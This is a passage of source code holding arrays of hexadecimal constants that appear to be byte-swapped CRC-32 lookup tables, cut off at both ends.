0x26921f4e00000000, 0x3323081500000000, 0xc0b3fa2300000000, 0x194127a300000000, 0xead1d59500000000, 0xff60c2ce00000000, 0x0cf030f800000000, 0x0c83081400000000, 0xff13fa2200000000, 0xeaa2ed7900000000, 0x19321f4f00000000, 0xc0c0c2cf00000000, 0x335030f900000000, 0x26e127a200000000, 0xd571d59400000000, 0x670126a100000000, 0x9491d49700000000, 0x8120c3cc00000000, 0x72b031fa00000000, 0xab42ec7a00000000, 0x58d21e4c00000000, 0x4d63091700000000, 0xbef3fb2100000000, 0xbe80c3cd00000000, 0x4d1031fb00000000, 0x58a126a000000000, 0xab31d49600000000, 0x72c3091600000000, 0x8153fb2000000000, 0x94e2ec7b00000000, 0x67721e4d00000000, 0xf0030a1000000000, 0x0393f82600000000, 0x1622ef7d00000000, 0xe5b21d4b00000000, 0x3c40c0cb00000000, 0xcfd032fd00000000, 0xda6125a600000000, 0x29f1d79000000000, 0x2982ef7c00000000, 0xda121d4a00000000, 0xcfa30a1100000000, 0x3c33f82700000000, 0xe5c125a700000000, 0x1651d79100000000, 0x03e0c0ca00000000, 0xf07032fc00000000, 0x4200c1c900000000, 0xb19033ff00000000, 0xa42124a400000000, 0x57b1d69200000000, 0x8e430b1200000000, 0x7dd3f92400000000, 0x6862ee7f00000000, 0x9bf21c4900000000, 0x9b8124a500000000, 0x6811d69300000000, 0x7da0c1c800000000, 0x8e3033fe00000000, 0x57c2ee7e00000000, 0xa4521c4800000000, 0xb1e30b1300000000, 0x4273f92500000000, 0x9f0023a900000000, 0x6c90d19f00000000, 0x7921c6c400000000, 0x8ab134f200000000, 0x5343e97200000000, 0xa0d31b4400000000, 0xb5620c1f00000000, 0x46f2fe2900000000, 0x4681c6c500000000, 0xb51134f300000000, 0xa0a023a800000000, 0x5330d19e00000000, 0x8ac20c1e00000000, 0x7952fe2800000000, 0x6ce3e97300000000, 0x9f731b4500000000, 0x2d03e87000000000, 0xde931a4600000000, 0xcb220d1d00000000, 0x38b2ff2b00000000, 0xe14022ab00000000, 0x12d0d09d00000000, 0x0761c7c600000000, 0xf4f135f000000000, 0xf4820d1c00000000, 0x0712ff2a00000000, 0x12a3e87100000000, 0xe1331a4700000000, 0x38c1c7c700000000, 0xcb5135f100000000, 0xdee022aa00000000, 0x2d70d09c00000000, 0xba01c4c100000000, 0x499136f700000000, 0x5c2021ac00000000, 0xafb0d39a00000000, 0x76420e1a00000000, 0x85d2fc2c00000000, 0x9063eb7700000000, 0x63f3194100000000, 0x638021ad00000000, 0x9010d39b00000000, 0x85a1c4c000000000, 0x763136f600000000, 0xafc3eb7600000000, 0x5c53194000000000, 0x49e20e1b00000000, 0xba72fc2d00000000, 0x08020f1800000000, 0xfb92fd2e00000000, 0xee23ea7500000000, 0x1db3184300000000, 0xc441c5c300000000, 0x37d137f500000000, 0x226020ae00000000, 0xd1f0d29800000000, 0xd183ea7400000000, 0x2213184200000000, 0x37a20f1900000000, 0xc432fd2f00000000, 0x1dc020af00000000, 0xee50d29900000000, 0xfbe1c5c200000000, 0x087137f400000000}, {0x0000000000000000, 0x3651822400000000, 0x6ca2044900000000, 0x5af3866d00000000, 0xd844099200000000, 0xee158bb600000000, 0xb4e60ddb00000000, 0x82b78fff00000000, 0xf18f63ff00000000, 0xc7dee1db00000000, 0x9d2d67b600000000, 0xab7ce59200000000, 0x29cb6a6d00000000, 0x1f9ae84900000000, 0x45696e2400000000, 0x7338ec0000000000, 0xa319b62500000000, 0x9548340100000000, 0xcfbbb26c00000000, 0xf9ea304800000000, 0x7b5dbfb700000000, 0x4d0c3d9300000000, 0x17ffbbfe00000000, 0x21ae39da00000000, 0x5296d5da00000000, 0x64c757fe00000000, 0x3e34d19300000000, 0x086553b700000000, 0x8ad2dc4800000000, 0xbc835e6c00000000, 0xe670d80100000000, 0xd0215a2500000000, 0x46336c4b00000000, 0x7062ee6f00000000, 0x2a91680200000000, 0x1cc0ea2600000000, 0x9e7765d900000000, 0xa826e7fd00000000, 0xf2d5619000000000, 0xc484e3b400000000, 0xb7bc0fb400000000, 0x81ed8d9000000000, 0xdb1e0bfd00000000, 0xed4f89d900000000, 0x6ff8062600000000, 0x59a9840200000000, 0x035a026f00000000, 0x350b804b00000000, 0xe52ada6e00000000, 0xd37b584a00000000, 0x8988de2700000000, 0xbfd95c0300000000, 0x3d6ed3fc00000000, 0x0b3f51d800000000, 0x51ccd7b500000000, 0x679d559100000000, 0x14a5b99100000000, 0x22f43bb500000000, 0x7807bdd800000000, 0x4e563ffc00000000, 0xcce1b00300000000, 0xfab0322700000000, 0xa043b44a00000000, 0x9612366e00000000, 0x8c66d89600000000, 0xba375ab200000000, 0xe0c4dcdf00000000, 0xd6955efb00000000, 0x5422d10400000000, 0x6273532000000000, 0x3880d54d00000000, 0x0ed1576900000000, 0x7de9bb6900000000, 0x4bb8394d00000000, 0x114bbf2000000000, 0x271a3d0400000000, 0xa5adb2fb00000000, 0x93fc30df00000000, 0xc90fb6b200000000, 0xff5e349600000000, 0x2f7f6eb300000000, 0x192eec9700000000, 0x43dd6afa00000000, 0x758ce8de00000000, 0xf73b672100000000, 0xc16ae50500000000, 0x9b99636800000000, 0xadc8e14c00000000, 0xdef00d4c00000000, 0xe8a18f6800000000, 0xb252090500000000, 0x84038b2100000000, 0x06b404de00000000, 0x30e586fa00000000, 0x6a16009700000000, 0x5c4782b300000000, 0xca55b4dd00000000, 0xfc0436f900000000, 0xa6f7b09400000000, 0x90a632b000000000, 0x1211bd4f00000000, 0x24403f6b00000000, 0x7eb3b90600000000, 0x48e23b2200000000, 0x3bdad72200000000, 0x0d8b550600000000, 0x5778d36b00000000, 0x6129514f00000000, 0xe39edeb000000000, 0xd5cf5c9400000000, 0x8f3cdaf900000000, 0xb96d58dd00000000, 0x694c02f800000000, 0x5f1d80dc00000000, 0x05ee06b100000000, 0x33bf849500000000, 0xb1080b6a00000000, 0x8759894e00000000, 0xddaa0f2300000000, 0xebfb8d0700000000, 0x98c3610700000000, 0xae92e32300000000, 0xf461654e00000000, 0xc230e76a00000000, 0x4087689500000000, 0x76d6eab100000000, 0x2c256cdc00000000, 0x1a74eef800000000, 0x59cbc1f600000000, 0x6f9a43d200000000, 0x3569c5bf00000000, 0x0338479b00000000, 0x818fc86400000000, 0xb7de4a4000000000, 0xed2dcc2d00000000, 0xdb7c4e0900000000, 0xa844a20900000000, 0x9e15202d00000000, 0xc4e6a64000000000, 0xf2b7246400000000, 0x7000ab9b00000000, 0x465129bf00000000, 0x1ca2afd200000000, 0x2af32df600000000, 0xfad277d300000000, 0xcc83f5f700000000, 0x9670739a00000000, 0xa021f1be00000000, 0x22967e4100000000, 0x14c7fc6500000000, 0x4e347a0800000000, 0x7865f82c00000000, 0x0b5d142c00000000, 0x3d0c960800000000, 0x67ff106500000000, 0x51ae924100000000, 0xd3191dbe00000000, 0xe5489f9a00000000, 0xbfbb19f700000000, 0x89ea9bd300000000, 0x1ff8adbd00000000, 0x29a92f9900000000, 0x735aa9f400000000, 0x450b2bd000000000, 0xc7bca42f00000000, 0xf1ed260b00000000, 0xab1ea06600000000, 0x9d4f224200000000, 0xee77ce4200000000, 0xd8264c6600000000, 0x82d5ca0b00000000, 0xb484482f00000000, 0x3633c7d000000000, 0x006245f400000000, 0x5a91c39900000000, 0x6cc041bd00000000, 0xbce11b9800000000, 0x8ab099bc00000000, 0xd0431fd100000000, 0xe6129df500000000, 0x64a5120a00000000, 0x52f4902e00000000, 0x0807164300000000, 0x3e56946700000000, 0x4d6e786700000000, 0x7b3ffa4300000000, 0x21cc7c2e00000000, 0x179dfe0a00000000, 0x952a71f500000000, 0xa37bf3d100000000, 0xf98875bc00000000, 0xcfd9f79800000000, 0xd5ad196000000000, 0xe3fc9b4400000000, 0xb90f1d2900000000, 0x8f5e9f0d00000000, 0x0de910f200000000, 0x3bb892d600000000, 0x614b14bb00000000, 0x571a969f00000000, 0x24227a9f00000000, 0x1273f8bb00000000, 0x48807ed600000000, 0x7ed1fcf200000000, 0xfc66730d00000000, 0xca37f12900000000, 0x90c4774400000000, 0xa695f56000000000, 0x76b4af4500000000, 0x40e52d6100000000, 0x1a16ab0c00000000, 0x2c47292800000000, 0xaef0a6d700000000, 0x98a124f300000000, 0xc252a29e00000000, 0xf40320ba00000000, 0x873bccba00000000, 0xb16a4e9e00000000, 0xeb99c8f300000000, 0xddc84ad700000000, 0x5f7fc52800000000, 0x692e470c00000000, 0x33ddc16100000000, 0x058c434500000000, 0x939e752b00000000, 0xa5cff70f00000000, 0xff3c716200000000, 0xc96df34600000000, 0x4bda7cb900000000, 0x7d8bfe9d00000000, 0x277878f000000000, 0x1129fad400000000, 0x621116d400000000, 0x544094f000000000, 0x0eb3129d00000000, 0x38e290b900000000, 0xba551f4600000000, 0x8c049d6200000000, 0xd6f71b0f00000000, 0xe0a6992b00000000, 0x3087c30e00000000, 0x06d6412a00000000, 0x5c25c74700000000, 0x6a74456300000000, 0xe8c3ca9c00000000, 0xde9248b800000000, 0x8461ced500000000, 0xb2304cf100000000, 0xc108a0f100000000, 0xf75922d500000000, 0xadaaa4b800000000, 0x9bfb269c00000000, 0x194ca96300000000, 0x2f1d2b4700000000, 0x75eead2a00000000, 0x43bf2f0e00000000}, {0x0000000000000000, 0xc8179ecf00000000, 0xd1294d4400000000, 0x193ed38b00000000, 0xa2539a8800000000, 0x6a44044700000000, 0x737ad7cc00000000, 0xbb6d490300000000, 0x05a145ca00000000, 0xcdb6db0500000000, 0xd488088e00000000, 0x1c9f964100000000, 0xa7f2df4200000000, 0x6fe5418d00000000, 0x76db920600000000, 0xbecc0cc900000000, 0x4b44fa4f00000000, 0x8353648000000000, 0x9a6db70b00000000, 0x527a29c400000000, 0xe91760c700000000, 0x2100fe0800000000, 0x383e2d8300000000, 0xf029b34c00000000, 0x4ee5bf8500000000, 0x86f2214a00000000, 0x9fccf2c100000000, 0x57db6c0e00000000, 0xecb6250d00000000, 0x24a1bbc200000000, 0x3d9f684900000000, 0xf588f68600000000, 0x9688f49f00000000, 0x5e9f6a5000000000, 0x47a1b9db00000000, 0x8fb6271400000000, 0x34db6e1700000000, 0xfcccf0d800000000, 0xe5f2235300000000, 0x2de5bd9c00000000, 0x9329b15500000000, 0x5b3e2f9a00000000, 0x4200fc1100000000, 0x8a1762de00000000, 0x317a2bdd00000000, 0xf96db51200000000, 0xe053669900000000, 0x2844f85600000000, 0xddcc0ed000000000, 0x15db901f00000000, 0x0ce5439400000000, 0xc4f2dd5b00000000, 0x7f9f945800000000, 0xb7880a9700000000, 0xaeb6d91c00000000, 0x66a147d300000000, 0xd86d4b1a00000000, 0x107ad5d500000000, 0x0944065e00000000, 0xc153989100000000, 0x7a3ed19200000000, 0xb2294f5d00000000, 0xab179cd600000000, 0x6300021900000000, 0x6d1798e400000000, 0xa500062b00000000, 0xbc3ed5a000000000, 0x74294b6f00000000, 0xcf44026c00000000, 0x07539ca300000000, 0x1e6d4f2800000000, 0xd67ad1e700000000, 0x68b6dd2e00000000, 0xa0a143e100000000, 0xb99f906a00000000, 0x71880ea500000000, 0xcae547a600000000, 0x02f2d96900000000, 0x1bcc0ae200000000, 0xd3db942d00000000, 0x265362ab00000000, 0xee44fc6400000000, 0xf77a2fef00000000, 0x3f6db12000000000, 0x8400f82300000000, 0x4c1766ec00000000, 0x5529b56700000000, 0x9d3e2ba800000000, 0x23f2276100000000, 0xebe5b9ae00000000, 0xf2db6a2500000000, 0x3accf4ea00000000, 0x81a1bde900000000, 0x49b6232600000000, 0x5088f0ad00000000, 0x989f6e6200000000, 0xfb9f6c7b00000000, 0x3388f2b400000000, 0x2ab6213f00000000, 0xe2a1bff000000000, 0x59ccf6f300000000, 0x91db683c00000000, 0x88e5bbb700000000, 0x40f2257800000000, 0xfe3e29b100000000, 0x3629b77e00000000, 0x2f1764f500000000, 0xe700fa3a00000000, 0x5c6db33900000000, 0x947a2df600000000, 0x8d44fe7d00000000, 0x455360b200000000, 0xb0db963400000000, 0x78cc08fb00000000, 0x61f2db7000000000, 0xa9e545bf00000000, 0x12880cbc00000000, 0xda9f927300000000, 0xc3a141f800000000, 0x0bb6df3700000000, 0xb57ad3fe00000000, 0x7d6d4d3100000000, 0x64539eba00000000, 0xac44007500000000, 0x1729497600000000, 0xdf3ed7b900000000, 0xc600043200000000, 0x0e179afd00000000, 0x9b28411200000000, 0x533fdfdd00000000, 0x4a010c5600000000, 0x8216929900000000, 0x397bdb9a00000000, 0xf16c455500000000, 0xe85296de00000000, 0x2045081100000000, 0x9e8904d800000000, 0x569e9a1700000000, 0x4fa0499c00000000, 0x87b7d75300000000, 0x3cda9e5000000000, 0xf4cd009f00000000, 0xedf3d31400000000, 0x25e44ddb00000000, 0xd06cbb5d00000000, 0x187b259200000000, 0x0145f61900000000, 0xc95268d600000000, 0x723f21d500000000, 0xba28bf1a00000000, 0xa3166c9100000000, 0x6b01f25e00000000, 0xd5cdfe9700000000, 0x1dda605800000000, 0x04e4b3d300000000, 0xccf32d1c00000000, 0x779e641f00000000, 0xbf89fad000000000, 0xa6b7295b00000000, 0x6ea0b79400000000, 0x0da0b58d00000000, 0xc5b72b4200000000, 0xdc89f8c900000000, 0x149e660600000000, 0xaff32f0500000000, 0x67e4b1ca00000000, 0x7eda624100000000, 0xb6cdfc8e00000000, 0x0801f04700000000, 0xc0166e8800000000, 0xd928bd0300000000, 0x113f23cc00000000, 0xaa526acf00000000, 0x6245f40000000000, 0x7b7b278b00000000, 0xb36cb94400000000, 0x46e44fc200000000, 0x8ef3d10d00000000, 0x97cd028600000000, 0x5fda9c4900000000, 0xe4b7d54a00000000, 0x2ca04b8500000000, 0x359e980e00000000, 0xfd8906c100000000, 0x43450a0800000000, 0x8b5294c700000000, 0x926c474c00000000, 0x5a7bd98300000000, 0xe116908000000000, 0x29010e4f00000000, 0x303fddc400000000, 0xf828430b00000000, 0xf63fd9f600000000, 0x3e28473900000000, 0x271694b200000000, 0xef010a7d00000000, 0x546c437e00000000, 0x9c7bddb100000000, 0x85450e3a00000000, 0x4d5290f500000000, 0xf39e9c3c00000000, 0x3b8902f300000000, 0x22b7d17800000000, 0xeaa04fb700000000, 0x51cd06b400000000, 0x99da987b00000000, 0x80e44bf000000000, 0x48f3d53f00000000, 0xbd7b23b900000000, 0x756cbd7600000000, 0x6c526efd00000000, 0xa445f03200000000, 0x1f28b93100000000, 0xd73f27fe00000000, 0xce01f47500000000, 0x06166aba00000000, 0xb8da667300000000, 0x70cdf8bc00000000, 0x69f32b3700000000, 0xa1e4b5f800000000, 0x1a89fcfb00000000, 0xd29e623400000000, 0xcba0b1bf00000000, 0x03b72f7000000000, 0x60b72d6900000000, 0xa8a0b3a600000000, 0xb19e602d00000000, 0x7989fee200000000, 0xc2e4b7e100000000, 0x0af3292e00000000, 0x13cdfaa500000000, 0xdbda646a00000000, 0x651668a300000000, 0xad01f66c00000000, 0xb43f25e700000000, 0x7c28bb2800000000, 0xc745f22b00000000, 0x0f526ce400000000, 0x166cbf6f00000000, 0xde7b21a000000000, 0x2bf3d72600000000, 0xe3e449e900000000, 0xfada9a6200000000, 0x32cd04ad00000000, 0x89a04dae00000000, 0x41b7d36100000000, 0x588900ea00000000, 0x909e9e2500000000, 0x2e5292ec00000000, 0xe6450c2300000000, 0xff7bdfa800000000, 0x376c416700000000, 0x8c01086400000000, 0x441696ab00000000, 0x5d28452000000000, 0x953fdbef00000000}, {0x0000000000000000, 0x95d4709500000000, 0x6baf90f100000000, 0xfe7be06400000000, 0x9758503800000000, 0x028c20ad00000000, 0xfcf7c0c900000000, 0x6923b05c00000000, 0x2eb1a07000000000, 0xbb65d0e500000000, 0x451e308100000000, 0xd0ca401400000000, 0xb9e9f04800000000, 0x2c3d80dd00000000, 0xd24660b900000000, 0x4792102c00000000, 0x5c6241e100000000, 0xc9b6317400000000, 0x37cdd11000000000, 0xa219a18500000000, 0xcb3a11d900000000, 0x5eee614c00000000, 0xa095812800000000, 0x3541f1bd00000000, 0x72d3e19100000000, 0xe707910400000000, 0x197c716000000000, 0x8ca801f500000000, 0xe58bb1a900000000, 0x705fc13c00000000, 0x8e24215800000000, 0x1bf051cd00000000, 0xf9c2f31900000000, 0x6c16838c00000000, 0x926d63e800000000, 0x07b9137d00000000, 0x6e9aa32100000000, 0xfb4ed3b400000000, 0x053533d000000000, 0x90e1434500000000, 0xd773536900000000, 0x42a723fc00000000, 0xbcdcc39800000000, 0x2908b30d00000000, 0x402b035100000000, 0xd5ff73c400000000, 0x2b8493a000000000, 0xbe50e33500000000, 0xa5a0b2f800000000, 0x3074c26d00000000, 0xce0f220900000000, 0x5bdb529c00000000, 0x32f8e2c000000000, 0xa72c925500000000, 0x5957723100000000, 0xcc8302a400000000, 0x8b11128800000000, 0x1ec5621d00000000, 0xe0be827900000000, 0x756af2ec00000000, 0x1c4942b000000000, 0x899d322500000000, 0x77e6d24100000000, 0xe232a2d400000000, 0xf285e73300000000, 0x675197a600000000, 0x992a77c200000000, 0x0cfe075700000000, 0x65ddb70b00000000, 0xf009c79e00000000, 0x0e7227fa00000000, 0x9ba6576f00000000, 0xdc34474300000000, 0x49e037d600000000, 0xb79bd7b200000000, 0x224fa72700000000, 0x4b6c177b00000000, 0xdeb867ee00000000, 0x20c3878a00000000, 0xb517f71f00000000, 0xaee7a6d200000000, 0x3b33d64700000000, 0xc548362300000000, 0x509c46b600000000, 0x39bff6ea00000000, 0xac6b867f00000000, 0x5210661b00000000, 0xc7c4168e00000000, 0x805606a200000000, 0x1582763700000000, 0xebf9965300000000, 0x7e2de6c600000000, 0x170e569a00000000, 0x82da260f00000000, 0x7ca1c66b00000000, 0xe975b6fe00000000, 0x0b47142a00000000, 0x9e9364bf00000000, 0x60e884db00000000, 0xf53cf44e00000000, 0x9c1f441200000000, 0x09cb348700000000, 0xf7b0d4e300000000, 0x6264a47600000000, 0x25f6b45a00000000, 0xb022c4cf00000000, 0x4e5924ab00000000, 0xdb8d543e00000000, 0xb2aee46200000000, 0x277a94f700000000, 0xd901749300000000, 0x4cd5040600000000, 0x572555cb00000000, 0xc2f1255e00000000, 0x3c8ac53a00000000, 0xa95eb5af00000000, 0xc07d05f300000000, 0x55a9756600000000, 0xabd2950200000000, 0x3e06e59700000000, 0x7994f5bb00000000, 0xec40852e00000000, 0x123b654a00000000, 0x87ef15df00000000, 0xeecca58300000000, 0x7b18d51600000000, 0x8563357200000000, 0x10b745e700000000, 0xe40bcf6700000000, 0x71dfbff200000000, 0x8fa45f9600000000, 0x1a702f0300000000, 0x73539f5f00000000, 0xe687efca00000000, 0x18fc0fae00000000, 0x8d287f3b00000000, 0xcaba6f1700000000, 0x5f6e1f8200000000, 0xa115ffe600000000, 0x34c18f7300000000, 0x5de23f2f00000000, 0xc8364fba00000000, 0x364dafde00000000, 0xa399df4b00000000, 0xb8698e8600000000, 0x2dbdfe1300000000, 0xd3c61e7700000000, 0x46126ee200000000, 0x2f31debe00000000, 0xbae5ae2b00000000, 0x449e4e4f00000000, 0xd14a3eda00000000, 0x96d82ef600000000, 0x030c5e6300000000, 0xfd77be0700000000, 0x68a3ce9200000000, 0x01807ece00000000, 0x94540e5b00000000, 0x6a2fee3f00000000, 0xfffb9eaa00000000, 0x1dc93c7e00000000, 0x881d4ceb00000000, 0x7666ac8f00000000, 0xe3b2dc1a00000000, 0x8a916c4600000000, 0x1f451cd300000000, 0xe13efcb700000000, 0x74ea8c2200000000, 0x33789c0e00000000, 0xa6acec9b00000000, 0x58d70cff00000000, 0xcd037c6a00000000, 0xa420cc3600000000, 0x31f4bca300000000, 0xcf8f5cc700000000, 0x5a5b2c5200000000, 0x41ab7d9f00000000, 0xd47f0d0a00000000, 0x2a04ed6e00000000, 0xbfd09dfb00000000, 0xd6f32da700000000, 0x43275d3200000000, 0xbd5cbd5600000000, 0x2888cdc300000000, 0x6f1addef00000000, 0xfacead7a00000000, 0x04b54d1e00000000, 0x91613d8b00000000, 0xf8428dd700000000, 0x6d96fd4200000000, 0x93ed1d2600000000, 0x06396db300000000, 0x168e285400000000, 0x835a58c100000000, 0x7d21b8a500000000, 0xe8f5c83000000000, 0x81d6786c00000000, 0x140208f900000000, 0xea79e89d00000000, 0x7fad980800000000, 0x383f882400000000, 0xadebf8b100000000, 0x539018d500000000, 0xc644684000000000, 0xaf67d81c00000000, 0x3ab3a88900000000, 0xc4c848ed00000000, 0x511c387800000000, 0x4aec69b500000000, 0xdf38192000000000, 0x2143f94400000000, 0xb49789d100000000, 0xddb4398d00000000, 0x4860491800000000, 0xb61ba97c00000000, 0x23cfd9e900000000, 0x645dc9c500000000, 0xf189b95000000000, 0x0ff2593400000000, 0x9a2629a100000000, 0xf30599fd00000000, 0x66d1e96800000000, 0x98aa090c00000000, 0x0d7e799900000000, 0xef4cdb4d00000000, 0x7a98abd800000000, 0x84e34bbc00000000, 0x11373b2900000000, 0x78148b7500000000, 0xedc0fbe000000000, 0x13bb1b8400000000, 0x866f6b1100000000, 0xc1fd7b3d00000000, 0x54290ba800000000, 0xaa52ebcc00000000, 0x3f869b5900000000, 0x56a52b0500000000, 0xc3715b9000000000, 0x3d0abbf400000000, 0xa8decb6100000000, 0xb32e9aac00000000, 0x26faea3900000000, 0xd8810a5d00000000, 0x4d557ac800000000, 0x2476ca9400000000, 0xb1a2ba0100000000, 0x4fd95a6500000000, 0xda0d2af000000000, 0x9d9f3adc00000000, 0x084b4a4900000000, 0xf630aa2d00000000, 0x63e4dab800000000, 0x0ac76ae400000000, 0x9f131a7100000000, 0x6168fa1500000000, 0xf4bc8a8000000000}, {0x0000000000000000, 0x1f17f08000000000, 0x7f2891da00000000, 0x603f615a00000000, 0xbf56536e00000000, 0xa041a3ee00000000, 0xc07ec2b400000000, 0xdf69323400000000, 0x7eada6dc00000000, 0x61ba565c00000000, 0x0185370600000000, 0x1e92c78600000000, 0xc1fbf5b200000000, 0xdeec053200000000, 0xbed3646800000000, 0xa1c494e800000000, 0xbd5c3c6200000000, 0xa24bcce200000000, 0xc274adb800000000, 0xdd635d3800000000, 0x020a6f0c00000000, 0x1d1d9f8c00000000, 0x7d22fed600000000, 0x62350e5600000000, 0xc3f19abe00000000, 0xdce66a3e00000000, 0xbcd90b6400000000, 0xa3cefbe400000000, 0x7ca7c9d000000000, 0x63b0395000000000, 0x038f580a00000000, 0x1c98a88a00000000, 0x7ab978c400000000, 0x65ae884400000000, 0x0591e91e00000000, 0x1a86199e00000000, 0xc5ef2baa00000000, 0xdaf8db2a00000000, 0xbac7ba7000000000, 0xa5d04af000000000, 0x0414de1800000000, 0x1b032e9800000000, 0x7b3c4fc200000000, 0x642bbf4200000000, 0xbb428d7600000000, 0xa4557df600000000, 0xc46a1cac00000000, 0xdb7dec2c00000000, 0xc7e544a600000000, 0xd8f2b42600000000, 0xb8cdd57c00000000, 0xa7da25fc00000000, 0x78b317c800000000, 0x67a4e74800000000, 0x079b861200000000, 0x188c769200000000, 0xb948e27a00000000, 0xa65f12fa00000000, 0xc66073a000000000, 0xd977832000000000, 0x061eb11400000000, 0x1909419400000000, 0x793620ce00000000, 0x6621d04e00000000, 0xb574805300000000, 0xaa6370d300000000, 0xca5c118900000000, 0xd54be10900000000, 0x0a22d33d00000000, 0x153523bd00000000, 0x750a42e700000000, 0x6a1db26700000000, 0xcbd9268f00000000, 0xd4ced60f00000000, 0xb4f1b75500000000, 0xabe647d500000000, 0x748f75e100000000, 0x6b98856100000000, 0x0ba7e43b00000000, 0x14b014bb00000000, 0x0828bc3100000000, 0x173f4cb100000000, 0x77002deb00000000, 0x6817dd6b00000000, 0xb77eef5f00000000, 0xa8691fdf00000000, 0xc8567e8500000000, 0xd7418e0500000000, 0x76851aed00000000, 0x6992ea6d00000000, 0x09ad8b3700000000, 0x16ba7bb700000000, 0xc9d3498300000000, 0xd6c4b90300000000, 0xb6fbd85900000000, 0xa9ec28d900000000, 0xcfcdf89700000000, 0xd0da081700000000, 0xb0e5694d00000000, 0xaff299cd00000000, 0x709babf900000000, 0x6f8c5b7900000000, 0x0fb33a2300000000, 0x10a4caa300000000, 0xb1605e4b00000000, 0xae77aecb00000000, 0xce48cf9100000000, 0xd15f3f1100000000, 0x0e360d2500000000, 0x1121fda500000000, 0x711e9cff00000000, 0x6e096c7f00000000, 0x7291c4f500000000, 0x6d86347500000000, 0x0db9552f00000000, 0x12aea5af00000000, 0xcdc7979b00000000, 0xd2d0671b00000000, 0xb2ef064100000000, 0xadf8f6c100000000, 0x0c3c622900000000, 0x132b92a900000000, 0x7314f3f300000000, 0x6c03037300000000, 0xb36a314700000000, 0xac7dc1c700000000, 0xcc42a09d00000000, 0xd355501d00000000, 0x6ae900a700000000, 0x75fef02700000000, 0x15c1917d00000000, 0x0ad661fd00000000, 0xd5bf53c900000000, 0xcaa8a34900000000, 0xaa97c21300000000, 0xb580329300000000, 0x1444a67b00000000, 0x0b5356fb00000000, 0x6b6c37a100000000, 0x747bc72100000000, 0xab12f51500000000, 0xb405059500000000, 0xd43a64cf00000000, 0xcb2d944f00000000, 0xd7b53cc500000000, 0xc8a2cc4500000000, 0xa89dad1f00000000, 0xb78a5d9f00000000, 0x68e36fab00000000, 0x77f49f2b00000000, 0x17cbfe7100000000, 0x08dc0ef100000000, 0xa9189a1900000000, 0xb60f6a9900000000, 0xd6300bc300000000, 0xc927fb4300000000, 0x164ec97700000000, 0x095939f700000000, 0x696658ad00000000, 0x7671a82d00000000, 0x1050786300000000, 0x0f4788e300000000, 0x6f78e9b900000000, 0x706f193900000000, 0xaf062b0d00000000, 0xb011db8d00000000, 0xd02ebad700000000, 0xcf394a5700000000, 0x6efddebf00000000, 0x71ea2e3f00000000, 0x11d54f6500000000, 0x0ec2bfe500000000, 0xd1ab8dd100000000, 0xcebc7d5100000000, 0xae831c0b00000000, 0xb194ec8b00000000, 0xad0c440100000000, 0xb21bb48100000000, 0xd224d5db00000000, 0xcd33255b00000000, 0x125a176f00000000, 0x0d4de7ef00000000, 0x6d7286b500000000, 0x7265763500000000, 0xd3a1e2dd00000000, 0xccb6125d00000000, 0xac89730700000000, 0xb39e838700000000, 0x6cf7b1b300000000, 0x73e0413300000000, 0x13df206900000000, 0x0cc8d0e900000000, 0xdf9d80f400000000, 0xc08a707400000000, 0xa0b5112e00000000, 0xbfa2e1ae00000000, 0x60cbd39a00000000, 0x7fdc231a00000000, 0x1fe3424000000000, 0x00f4b2c000000000, 0xa130262800000000, 0xbe27d6a800000000, 0xde18b7f200000000, 0xc10f477200000000, 0x1e66754600000000, 0x017185c600000000, 0x614ee49c00000000, 0x7e59141c00000000, 0x62c1bc9600000000, 0x7dd64c1600000000, 0x1de92d4c00000000, 0x02feddcc00000000, 0xdd97eff800000000, 0xc2801f7800000000, 0xa2bf7e2200000000, 0xbda88ea200000000, 0x1c6c1a4a00000000, 0x037beaca00000000, 0x63448b9000000000, 0x7c537b1000000000, 0xa33a492400000000, 0xbc2db9a400000000, 0xdc12d8fe00000000, 0xc305287e00000000, 0xa524f83000000000, 0xba3308b000000000, 0xda0c69ea00000000, 0xc51b996a00000000, 0x1a72ab5e00000000, 0x05655bde00000000, 0x655a3a8400000000, 0x7a4dca0400000000, 0xdb895eec00000000, 0xc49eae6c00000000, 0xa4a1cf3600000000, 0xbbb63fb600000000, 0x64df0d8200000000, 0x7bc8fd0200000000, 0x1bf79c5800000000, 0x04e06cd800000000, 0x1878c45200000000, 0x076f34d200000000, 0x6750558800000000, 0x7847a50800000000, 0xa72e973c00000000, 0xb83967bc00000000, 0xd80606e600000000, 0xc711f66600000000, 0x66d5628e00000000, 0x79c2920e00000000, 0x19fdf35400000000, 0x06ea03d400000000, 0xd98331e000000000, 0xc694c16000000000, 0xa6aba03a00000000, 0xb9bc50ba00000000}, {0x0000000000000000, 0xe2fd888d00000000, 0x85fd60c000000000, 0x6700e84d00000000, 0x4bfdb05b00000000, 0xa90038d600000000, 0xce00d09b00000000, 0x2cfd581600000000, 0x96fa61b700000000, 0x7407e93a00000000, 0x1307017700000000, 0xf1fa89fa00000000, 0xdd07d1ec00000000, 0x3ffa596100000000, 0x58fab12c00000000, 0xba0739a100000000, 0x6df3b2b500000000, 0x8f0e3a3800000000, 0xe80ed27500000000, 0x0af35af800000000, 0x260e02ee00000000, 0xc4f38a6300000000, 0xa3f3622e00000000, 0x410eeaa300000000, 0xfb09d30200000000, 0x19f45b8f00000000, 0x7ef4b3c200000000, 0x9c093b4f00000000, 0xb0f4635900000000, 0x5209ebd400000000, 0x3509039900000000, 0xd7f48b1400000000, 0x9be014b000000000, 0x791d9c3d00000000, 0x1e1d747000000000, 0xfce0fcfd00000000, 0xd01da4eb00000000, 0x32e02c6600000000, 0x55e0c42b00000000, 0xb71d4ca600000000, 0x0d1a750700000000, 0xefe7fd8a00000000, 0x88e715c700000000, 0x6a1a9d4a00000000, 0x46e7c55c00000000, 0xa41a4dd100000000, 0xc31aa59c00000000, 0x21e72d1100000000, 0xf613a60500000000, 0x14ee2e8800000000, 0x73eec6c500000000, 0x91134e4800000000, 0xbdee165e00000000, 0x5f139ed300000000, 0x3813769e00000000, 0xdaeefe1300000000, 0x60e9c7b200000000, 0x82144f3f00000000, 0xe514a77200000000, 0x07e92fff00000000, 0x2b1477e900000000, 0xc9e9ff6400000000, 0xaee9172900000000, 0x4c149fa400000000, 0x77c758bb00000000, 0x953ad03600000000, 0xf23a387b00000000, 0x10c7b0f600000000, 0x3c3ae8e000000000, 0xdec7606d00000000, 0xb9c7882000000000, 0x5b3a00ad00000000, 0xe13d390c00000000, 0x03c0b18100000000, 0x64c059cc00000000, 0x863dd14100000000, 0xaac0895700000000, 0x483d01da00000000, 0x2f3de99700000000, 0xcdc0611a00000000, 0x1a34ea0e00000000, 0xf8c9628300000000, 